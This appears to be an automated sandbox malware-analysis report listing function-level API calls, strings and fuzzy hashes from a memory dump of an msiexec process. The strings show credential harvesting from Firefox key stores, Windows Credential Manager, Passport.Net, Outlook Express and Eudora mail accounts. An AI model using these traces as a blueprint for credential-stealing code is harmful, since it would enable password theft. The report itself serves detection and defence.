                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpystrlen$memsetsprintf
                                                                                                        • String ID: %s (%s)
                                                                                                        • API String ID: 3756086014-1363028141
                                                                                                        • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                        • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                        • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                        • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                        Function 00410863 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                        • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                        • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                        Strings
                                                                                                        • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                        • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                        • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                        • API String ID: 1640410171-3316789007
                                                                                                        • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                        • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                                        • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                        • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                                        Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _mbscat$memsetsprintf
                                                                                                        • String ID: %2.2X
                                                                                                        • API String ID: 125969286-791839006
                                                                                                        • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                        • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                        • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                        • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                        Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                                        • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                          • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                          • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                          • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                          • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                          • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                          • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                          • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$??2@??3@$ByteCharCloseHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                        • String ID: ACD
                                                                                                        • API String ID: 82305771-620537770
                                                                                                        • Opcode ID: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                                                        • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                        • Opcode Fuzzy Hash: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                                                        • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                        Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004091EC
                                                                                                        • sprintf.MSVCRT ref: 00409201
                                                                                                          • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                          • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                          • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                        • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                        • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                        • String ID: caption$dialog_%d
                                                                                                        • API String ID: 2923679083-4161923789
                                                                                                        • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                        • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                        • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                        • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                        Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                                        • memset.MSVCRT ref: 00410246
                                                                                                        • memset.MSVCRT ref: 00410258
                                                                                                          • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                        • memset.MSVCRT ref: 0041033F
                                                                                                        • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                        • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 3974772901-0
                                                                                                        • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                        • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                        • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                        • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                        Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • wcslen.MSVCRT ref: 0044406C
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                        • strlen.MSVCRT ref: 004440D1
                                                                                                          • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                          • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                        • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 577244452-0
                                                                                                        • Opcode ID: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                                        • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                        • Opcode Fuzzy Hash: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                                        • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                        Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                          • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                        • _strcmpi.MSVCRT ref: 00404518
                                                                                                        • _strcmpi.MSVCRT ref: 00404536
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strcmpi$memcpystrlen
                                                                                                        • String ID: imap$pop3$smtp
                                                                                                        • API String ID: 2025310588-821077329
                                                                                                        • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                        • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                        • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                        • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                        Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040C02D
                                                                                                          • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                          • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                          • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                          • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                          • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                          • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                          • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                          • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                          • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                          • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                          • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                        • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                        • API String ID: 2726666094-3614832568
                                                                                                        • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                        • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                        • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                        • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                        Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                          • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                          • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                          • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                        • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                        • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                        • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcmp$memcpy
                                                                                                        • String ID: global-salt$password-check
                                                                                                        • API String ID: 231171946-3927197501
                                                                                                        • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                        • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                        • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                        • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                        Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@
                                                                                                        • String ID:
                                                                                                        • API String ID: 613200358-0
                                                                                                        • Opcode ID: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                                                        • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                        • Opcode Fuzzy Hash: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                                                        • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                        Function 00401694 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                        • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                        • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                        • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                        • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                        • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                        • String ID:
                                                                                                        • API String ID: 19018683-0
                                                                                                        • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                        • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                        • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                        • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                        Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040644F
                                                                                                        • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                        • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                          • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                          • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                          • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                          • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                          • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                        • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                        • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                        • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                        • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                          • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 438689982-0
                                                                                                        • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                        • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                        • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                        • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                        Function 0040F6E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                          • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                          • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                          • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                        • strlen.MSVCRT ref: 0040F7BE
                                                                                                        • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                        • String ID: Passport.Net\*
                                                                                                        • API String ID: 2329438634-3671122194
                                                                                                        • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                        • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                        • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                        • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                                        Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                        • memset.MSVCRT ref: 0040330B
                                                                                                        • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                        • strchr.MSVCRT ref: 0040335A
                                                                                                          • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                        • strlen.MSVCRT ref: 0040339C
                                                                                                          • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                        • String ID: Personalities
                                                                                                        • API String ID: 2103853322-4287407858
                                                                                                        • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                        • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                        • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                        • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                        Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset
                                                                                                        • String ID: H
                                                                                                        • API String ID: 2221118986-2852464175
                                                                                                        • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                        • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                        • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                        • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
